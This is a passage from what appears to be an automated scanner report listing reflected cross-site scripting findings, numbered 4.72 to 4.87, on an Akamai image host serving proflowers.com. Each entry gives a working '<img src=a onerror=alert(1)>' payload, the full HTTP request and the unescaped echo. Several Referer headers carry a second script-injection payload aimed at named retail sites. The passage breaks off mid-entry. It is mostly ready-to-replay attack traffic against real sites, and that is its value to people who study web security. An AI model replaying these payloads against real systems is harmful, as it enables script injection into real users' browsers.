HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: no-store
Date: Mon, 09 May 2011 12:12:34 GMT
Connection: close

Unable to find /ProvideCommerce/Mdaycard10_ACe5c08<img src=a onerror=alert(1)>f66d8f8ae36

4.72. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAGRDN_RoseSpaV2_GEN_10_S10_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAGRDN_RoseSpaV2_GEN_10_S10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 7e221<img%20src%3da%20onerror%3dalert(1)>fb7298d04e was submitted in the REST URL parameter 9. This input was echoed as 7e221<img src=a onerror=alert(1)>fb7298d04e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAGRDN_RoseSpaV2_GEN_10_S10_SQ7e221<img%20src%3da%20onerror%3dalert(1)>fb7298d04e?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 113
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:13 GMT
Connection: close

Unable to find /ProvideCommerce/OCC_CKGSPAGRDN_RoseSpaV2_GEN_10_S10_SQ7e221<img src=a onerror=alert(1)>fb7298d04e

4.73. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2e51a<img%20src%3da%20onerror%3dalert(1)>f85c7e7ee4 was submitted in the REST URL parameter 9. This input was echoed as 2e51a<img src=a onerror=alert(1)>f85c7e7ee4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_PF2e51a<img%20src%3da%20onerror%3dalert(1)>f85c7e7ee4?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 112
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:58 GMT
Connection: close

Unable to find /ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_PF2e51a<img src=a onerror=alert(1)>f85c7e7ee4

4.74. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3eff6<img%20src%3da%20onerror%3dalert(1)>448fbcc17a4 was submitted in the REST URL parameter 9. This input was echoed as 3eff6<img src=a onerror=alert(1)>448fbcc17a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_SQ3eff6<img%20src%3da%20onerror%3dalert(1)>448fbcc17a4?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 113
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:29 GMT
Connection: close

Unable to find /ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_SQ3eff6<img src=a onerror=alert(1)>448fbcc17a4

4.75. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inbaby_tcuppnk09_Vday__ASPM_CNTRL_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inbaby_tcuppnk09_Vday__ASPM_CNTRL_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 54ec7<img%20src%3da%20onerror%3dalert(1)>fe758beee42 was submitted in the REST URL parameter 9. This input was echoed as 54ec7<img src=a onerror=alert(1)>fe758beee42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inbaby_tcuppnk09_Vday__ASPM_CNTRL_PF54ec7<img%20src%3da%20onerror%3dalert(1)>fe758beee42?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 116
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:00 GMT
Connection: close

Unable to find /ProvideCommerce/ORC3inbaby_tcuppnk09_Vday__ASPM_CNTRL_PF54ec7<img src=a onerror=alert(1)>fe758beee42

4.76. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblpurpphal_blktin09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblpurpphal_blktin09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 87390<img%20src%3da%20onerror%3dalert(1)>6127ad3d4b was submitted in the REST URL parameter 9. This input was echoed as 87390<img src=a onerror=alert(1)>6127ad3d4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblpurpphal_blktin09_PF87390<img%20src%3da%20onerror%3dalert(1)>6127ad3d4b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:03 GMT
Connection: close

Unable to find /ProvideCommerce/ORC6indblpurpphal_blktin09_PF87390<img src=a onerror=alert(1)>6127ad3d4b

4.77. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblwhtphal_willow09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblwhtphal_willow09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 27412<img%20src%3da%20onerror%3dalert(1)>83ab8e888d1 was submitted in the REST URL parameter 9. This input was echoed as 27412<img src=a onerror=alert(1)>83ab8e888d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblwhtphal_willow09_PF27412<img%20src%3da%20onerror%3dalert(1)>83ab8e888d1?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:05 GMT
Connection: close

Unable to find /ProvideCommerce/ORC6indblwhtphal_willow09_PF27412<img src=a onerror=alert(1)>83ab8e888d1

4.78. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6inphaltilandsia_curn09_l [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6inphaltilandsia_curn09_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 136d7<img%20src%3da%20onerror%3dalert(1)>f39e388d55c was submitted in the REST URL parameter 9. This input was echoed as 136d7<img src=a onerror=alert(1)>f39e388d55c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6inphaltilandsia_curn09_l136d7<img%20src%3da%20onerror%3dalert(1)>f39e388d55c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:08 GMT
Connection: close

Unable to find /ProvideCommerce/ORC6inphaltilandsia_curn09_l136d7<img src=a onerror=alert(1)>f39e388d55c

4.79. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3e66c<img%20src%3da%20onerror%3dalert(1)>e0bdb592a3a was submitted in the REST URL parameter 9. This input was echoed as 3e66c<img src=a onerror=alert(1)>e0bdb592a3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF3e66c<img%20src%3da%20onerror%3dalert(1)>e0bdb592a3a?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=86&hei=100 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 95
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:28 GMT
Connection: close

Unable to find /ProvideCommerce/ORCbromgrdnblk07_PF3e66c<img src=a onerror=alert(1)>e0bdb592a3a

4.80. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblbromgardn09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblbromgardn09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a3ae1<img%20src%3da%20onerror%3dalert(1)>81037f6294b was submitted in the REST URL parameter 9. This input was echoed as a3ae1<img src=a onerror=alert(1)>81037f6294b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblbromgardn09_PFa3ae1<img%20src%3da%20onerror%3dalert(1)>81037f6294b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:01 GMT
Connection: close

Unable to find /ProvideCommerce/ORCdblbromgardn09_PFa3ae1<img src=a onerror=alert(1)>81037f6294b

4.81. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblkalblktin08_2_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblkalblktin08_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2ac5a<img%20src%3da%20onerror%3dalert(1)>380fac3babc was submitted in the REST URL parameter 9. This input was echoed as 2ac5a<img src=a onerror=alert(1)>380fac3babc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblkalblktin08_2_PF2ac5a<img%20src%3da%20onerror%3dalert(1)>380fac3babc?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:05 GMT
Connection: close

Unable to find /ProvideCommerce/ORCdblkalblktin08_2_PF2ac5a<img src=a onerror=alert(1)>380fac3babc

4.82. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblorchidheart_silvervasepink11_PC1936_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblorchidheart_silvervasepink11_PC1936_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 56e55<img%20src%3da%20onerror%3dalert(1)>02759dc1b02 was submitted in the REST URL parameter 9. This input was echoed as 56e55<img src=a onerror=alert(1)>02759dc1b02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblorchidheart_silvervasepink11_PC1936_PF56e55<img%20src%3da%20onerror%3dalert(1)>02759dc1b02?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 120
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:13 GMT
Connection: close

Unable to find /ProvideCommerce/ORCdblorchidheart_silvervasepink11_PC1936_PF56e55<img src=a onerror=alert(1)>02759dc1b02

4.83. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCwhtphalylwbrom07_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCwhtphalylwbrom07_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f29c8<img%20src%3da%20onerror%3dalert(1)>5ffa66e876e was submitted in the REST URL parameter 9. This input was echoed as f29c8<img src=a onerror=alert(1)>5ffa66e876e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCwhtphalylwbrom07_PFf29c8<img%20src%3da%20onerror%3dalert(1)>5ffa66e876e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:07 GMT
Connection: close

Unable to find /ProvideCommerce/ORCwhtphalylwbrom07_PFf29c8<img src=a onerror=alert(1)>5ffa66e876e

4.84. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026339b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026339b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload d4bb1<img%20src%3da%20onerror%3dalert(1)>e7af5ef796 was submitted in the REST URL parameter 9. This input was echoed as d4bb1<img src=a onerror=alert(1)>e7af5ef796 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026339bd4bb1<img%20src%3da%20onerror%3dalert(1)>e7af5ef796?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:31 GMT
Connection: close

Unable to find /ProvideCommerce/P0026339bd4bb1<img src=a onerror=alert(1)>e7af5ef796

4.85. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0049189b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0049189b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a8f1a<img%20src%3da%20onerror%3dalert(1)>e4b9939c645 was submitted in the REST URL parameter 9. This input was echoed as a8f1a<img src=a onerror=alert(1)>e4b9939c645 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0049189ba8f1a<img%20src%3da%20onerror%3dalert(1)>e4b9939c645?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:25 GMT
Connection: close

Unable to find /ProvideCommerce/P0049189ba8f1a<img src=a onerror=alert(1)>e4b9939c645

4.86. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054324b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054324b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 953c7<img%20src%3da%20onerror%3dalert(1)>d73bd45dd2 was submitted in the REST URL parameter 9. This input was echoed as 953c7<img src=a onerror=alert(1)>d73bd45dd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054324b953c7<img%20src%3da%20onerror%3dalert(1)>d73bd45dd2?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:25 GMT
Connection: close

Unable to find /ProvideCommerce/P0054324b953c7<img src=a onerror=alert(1)>d73bd45dd2

4.87. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0055092b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0055092b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c4c9f<img%20src%3da%20onerror%3dalert(1)>f3daf93728a was submitted in the REST URL parameter 9. This input was echoed as c4c9f<img src=a onerror=alert(1)>f3daf93728a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

